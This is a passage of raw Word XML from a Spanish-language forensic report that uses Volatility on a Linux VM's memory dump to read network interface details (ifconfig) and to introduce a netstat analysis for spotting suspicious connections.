ZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCGdpy3ywAA&#10;AOEAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:imagedata r:id="rId198" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1164" type="#_x0000_t202" style="position:absolute;left:34659;top:637;width:19291;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NAszAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYIXsZvaJJTYbSlFQb0UYy/eHtnXbDT7Nuxu2vjvXUHocZiZb5jVZrK9OJEPnWMF81kG&#10;grhxuuNWweHj+X4JIkRkjb1jUvBDATbr66sVVtqd+Z1OdWxFgnCoUIGJcaikDI0hi2HmBuLkHZ23&#10;GJP0rdQezwlue/mQZaW02HFaMDjQzlDzXY9WwT7/3Ju78fj0ts0X/vUw7sqvtlbq9mbaPoKINMVL&#10;+L/9ohWUy6Io8sW8hL9L6Q7I9S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAUHjQLMwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3605147D" w14:textId="69B3DFDE" w:rsidR="00915A6C" w:rsidRPr="003E7AEF" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>42</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="106" w:name="_Toc155782609"/>
                        <w:r w:rsidRPr="00ED0A85">
                          <w:t>Comando linux_ifconfig.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="106"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005A186E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el cual revela toda la información de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA43C89" w14:textId="744C7114" w:rsidR="00FF4835" w:rsidRPr="00FF4835" w:rsidRDefault="00FF4835" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155754816 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XVIII. Comando linux_ifconfig.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A9436" w14:textId="239AF48B" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un breve análisis de este comando es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334B5E9" w14:textId="51088CEE" w:rsidR="000C4414" w:rsidRPr="0016269A" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Solo tiene una interfaz de conexión de red conectada, </w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18335A67" w14:textId="704C9173" w:rsidR="000C4414" w:rsidRPr="0016269A" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una dirección IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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16269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lógica y es la de localhost, como en el apartado anterior hemos encontrado también la etiqueta </w:t>
      </w:r>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, podemos intuir que es de loopback</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Loopback: Dirección IP utilizada para probar la red interna de un dispositivo.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16269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o similar. Se puede considerar un dato desechable en ese sentido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051FE216" w14:textId="562D2617" w:rsidR="000C4414" w:rsidRPr="0016269A" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La dirección IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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16269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la VM es 172.31.38.110.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3331271B" w14:textId="7691FA36" w:rsidR="000C4414" w:rsidRPr="0016269A" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La dirección MAC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MAC: Media Access Control, dirección única asignada a la interfaz de red de un dispositivo.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16269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la VM es </w:t>
      </w:r>
      <w:bookmarkStart w:id="107" w:name="_Hlk155296551"/>
      <w:r w:rsidR="00A93567" w:rsidRPr="00A93567">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>06:4C:CD:F6:51:2C</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidR="00A93567" w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se podría estudiar la interfaz de red de esta máquina y hacer un MAC lookup</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MAC lookup: Proceso de identificación del fabricante de un dispositivo a través de su dirección MAC.</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16269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, pero directamente voy a considerar que, al tener constancia de que es una VM, puedo acreditar directamente que es una MAC virtual. Ya que las máquinas virtuales suelen comunicarse a través de una red interna virtual a la red exterior, usando todos ellos la misma MAC física, y siendo esta red interna virtual como un Switch que distribuye a necesidad dentro de la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB60ABA" w14:textId="0C38AC18" w:rsidR="000C4414" w:rsidRPr="0016269A" w:rsidRDefault="000C4414">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La interfaz de red </w:t>
      </w:r>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> no </w:t>
      </w:r>
      <w:r w:rsidR="007B516F" w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en modo promiscuo o monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA02D2" w14:textId="30698059" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="0016269A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:t>Linux_netstat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E6F71" w14:textId="1ADF629D" w:rsidR="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En este apartado procederemos a tratar de tener una visi</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">n detallada de las conexiones de red, para ello ejecutaremos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Con este comando, obtendremos información </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de todas</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> las conexiones TCP y UDP activas, incluyendo direcciones IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y puertos locales y remotos, así como el estado de estas conexiones. Esta información es crucial para comprender con qué otros sistemas y servicios estaba interactuando el sistema en cuestión. Es especialmente valioso para identificar comunicaciones sospechosas o no autorizadas, como conexiones a direcciones IP desconocidas o el uso de puertos inusuales, que podrían indicar actividad maliciosa, como exfiltración de datos, comando y control de malware, o accesos no autorizados. </w:t>
      </w:r>
      <w:r w:rsidR="0016269A" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El comando por utilizar</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es </w:t>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_netstat</w:t>
      </w:r>
      <w:r w:rsidR="00927E54">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se </w:t>
      </w:r>
      <w:r w:rsidR="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>adjunta</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> captura del comando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD68BCC" w14:textId="41B3E71A" w:rsidR="00EA137B" w:rsidRDefault="00CC13F8" w:rsidP="00CC13F8">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251871232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B701AC6" wp14:editId="7B5CEDF4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>237518</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1684655" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="266097623" name="Cuadro de texto 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1684655" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="505DD856" w14:textId="5F56A0FF" w:rsidR="00EA137B" w:rsidRPr="00962C8C" w:rsidRDefault="00EA137B" w:rsidP="00EA137B">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                              <w:r w:rsidR="00117A4E">
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                                <w:t>43</w:t>
                              </w:r>
                            </w:fldSimple>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:bookmarkStart w:id="108" w:name="_Toc155782610"/>
                            <w:r>
                              <w:t>Extracto de comando linux_netstat.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701AC6" id="_x0000_s1165" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:81.45pt;margin-top:18.7pt;width:132.65pt;height:.05pt;z-index:2518712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JkMGgIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU1Fv2jAQfp+0/2D5fQS6gipEqBgV0yTU&#10;VqJTn43jEEuOzzsbEvbrd3YS6Lo9TXtxLr7zd77v+7y4b2vDTgq9BpvzyWjMmbISCm0POf/+svl0&#10;x5kPwhbCgFU5PyvP75cfPywaN1c3UIEpFDICsX7euJxXIbh5lnlZqVr4EThlKVkC1iLQLx6yAkVD&#10;6LXJbsbjWdYAFg5BKu9p96FL8mXCL0slw1NZehWYyTndLaQV07qPa7ZciPkBhau07K8h/uEWtdCW&#10;ml6gHkQQ7Ij6D6haSwQPZRhJqDMoSy1VmoGmmYzfTbOrhFNpFiLHuwtN/v/BysfTzj0jC+0XaEnA&#10;SEjj/NzTZpynLbGOX7opozxReL7QptrAZDw0u7udTaecScrNPk8jRnY96tCHrwpqFoOcI2mSqBKn&#10;rQ9d6VASO3kwuthoY+JPTKwNspMg/ZpKB9WD/1ZlbKy1EE91gHEnu84Ro9DuW6aLnN9ehtxDcabZ&#10;ETpbeCc3mhpuhQ/PAskHNC55OzzRUhpocg59xFkF+PNv+7Ge5KEsZw35Kuf+x1Gg4sx8syRcNOEQ&#10;4BDsh8Ae6zXQqBN6NU6mkA5gMENYItSvZPlV7EIpYSX1ynkYwnXo3E1PRqrVKhWR1ZwIW7tzMkIP&#10;xL60rwJdL0sgNR9hcJyYv1Onq036uNUxENVJukhsx2LPN9k0id8/qfgO3v6nquvDX/4CAAD//wMA&#10;UEsDBBQABgAIAAAAIQAK0Sf/3gAAAAYBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyD&#10;tUhcEHVo0hSFOFVVwQEuFaGX3tx4GwfidWQ7bfh73FM57sxo5m25mkzPTuh8Z0nA0ywBhtRY1VEr&#10;YPf19vgMzAdJSvaWUMAvelhVtzelLJQ90yee6tCyWEK+kAJ0CEPBuW80GulndkCK3tE6I0M8XcuV&#10;k+dYbno+T5KcG9lRXNBywI3G5qcejYBttt/qh/H4+rHOUve+Gzf5d1sLcX83rV+ABZzCNQwX/IgO&#10;VWQ62JGUZ72A+EgQkC4zYNGd54sU2OEiLIBXJf+PX/0BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAA